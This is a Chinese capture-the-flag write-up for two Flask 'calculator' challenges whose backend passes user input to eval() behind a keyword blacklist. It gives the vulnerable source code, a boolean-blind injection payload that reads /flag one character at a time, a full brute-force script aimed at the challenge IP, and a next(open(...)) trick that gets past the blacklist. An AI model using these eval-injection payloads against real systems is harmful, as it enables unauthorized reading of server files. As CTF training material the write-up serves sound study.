简单的计算题1
源代码
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from flask import Flask, render_template, request,session
from config import black_list,create
import os
app = Flask(__name__)
app.config['SECRET_KEY'] = os.urandom(24)
## flag is in /flag try to get it
@app.route('/', methods=['GET', 'POST'])
def index():
def filter(string):
for black_word in black_list:
if black_word in string:
return "hack"
return string
if request.method == 'POST':
input = request.form['input']
create_question = create()
input_question = session.get('question')
session['question'] = create_question
if input_question==None:
return render_template('index.html', answer="Invalid session please try again!", question=create_question)
if filter(input)=="hack":
return render_template('index.html', answer="hack", question=create_question)
try:
calc_result = str((eval(input_question + "=" + str(input))))
if calc_result == 'True':
result = "Congratulations"
elif calc_result == 'False':
result = "Error"
else:
result = "Invalid"
except:
result = "Invalid"
return render_template('index.html', answer=result,question=create_question)
if request.method == 'GET':
create_question = create()
session['question'] = create_question
return render_template('index.html',question=create_question)
@app.route('/source')
def source():
return open("app.py", "r").read()
if __name__ == '__main__':
app.run(host="0.0.0.0", debug=False)解题步骤
审计代码可知后台是根据eval(input_question + "=" + str(input))返回的结果进行判断,只过滤了or,知道flag的位置,可以通过“布尔盲注”来读取flag,
构造payload:answer and 'x'==open('/flag','r').read()[0:1]
读取flag的第一个字符与x比较,如果相等,那么前后都为真,返回True,不相等返回False。
需要注意的是,每次请求服务器都会返回一个不同的session,回答问题需要携带这个cookie,所以写脚本需要注意一下cookie,可以将返回的cookie取出来,也可以直接用requests.session(),就不用格外管cookie了。
解题脚本
import requests
burp1_headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Upgrade-Insecure-Requests": "1", "Origin": "http://183.129.189.60:10026", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://183.129.189.60:10026/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh-HK;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6", "Connection": "close"}
burp1_cookie = {}
burp1_data = {"input": "7524725"}
burp0_url = "http://183.129.189.60:10026/"
burp0_headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh-HK;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6", "Connection": "close"}
responses = requests.get(burp0_url, headers=burp0_headers)
burp1_cookie = responses.cookies.get_dict()
burp1_data['input'] = str(eval(responses.text.split('<h4>')[1].split('=</h4>')[0]))
burp1_data['input'] += ' and "{}"==open("/flag","r").read()[{}:{}]'.format(chr(0),str(0),str(0+1))
# responses = session.post(burp0_url, headers=burp1_headers, data=burp1_data)
flag = ''
for i in range(0,50):
for j in range(33,128):
while True:
try:
responses = requests.post(burp0_url, headers=burp1_headers, data=burp1_data, cookies=burp1_cookie)
burp1_cookie = responses.cookies.get_dict()
burp1_data['input'] = str(eval(responses.text.split('<h4>')[1].split('=</h4>')[0]))
burp1_data['input'] += ' and "{}"==open("/flag","r").read()[{}:{}]'.format(chr(j),str(i),str(i+1))
if 'Congratulations' in responses.text:
flag += chr(j-1)
print(flag)
break
if 'Error' in responses.text:
break
except Exception as e:
pass
简单的计算题2
源代码
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from flask import Flask, render_template, request,session
from config import black_list,create
import os
app = Flask(__name__)
app.config['SECRET_KEY'] = os.urandom(24)
## flag is in /flag try to get it
@app.route('/', methods=['GET', 'POST'])
def index():
def filter(string):
for black_word in black_list:
if black_word in string:
return "hack"
return string
if request.method == 'POST':
input = request.form['input']
create_question = create()
input_question = session.get('question')
session['question'] = create_question
if input_question == None:
return render_template('index.html', answer="Invalid session please try again!", question=create_question)
if filter(input)=="hack":
return render_template('index.html', answer="hack", question=create_question)
calc_str = input_question + "=" + str(input)
try:
calc_result = str((eval(calc_str)))
except Exception as ex:
calc_result = "Invalid"
return render_template('index.html', answer=calc_result,question=create_question)
if request.method == 'GET':
create_question = create()
session['question'] = create_question
return render_template('index.html',question=create_question)
@app.route('/source')
def source():
return open("app.py", "r").read()
if __name__ == '__main__':
app.run(host="0.0.0.0", debug=False)解题步骤
和第一个差不多,只是过滤的东西更多了,最重要的是read给过滤了,这怎么办,难道不能用open了?
百度了一下python读文件的方法,看到可以用for来一行一行的读文件
f = open('/flag','r')
for x in f:
print(f)原来open()返回的是个迭代器,那么就可以写成下面这样
next(open('/flag','r'))这样就读出来了第一行,没过滤next,这就跟前面一样了,稍微改一下代码就可以。这是不是非预期了?!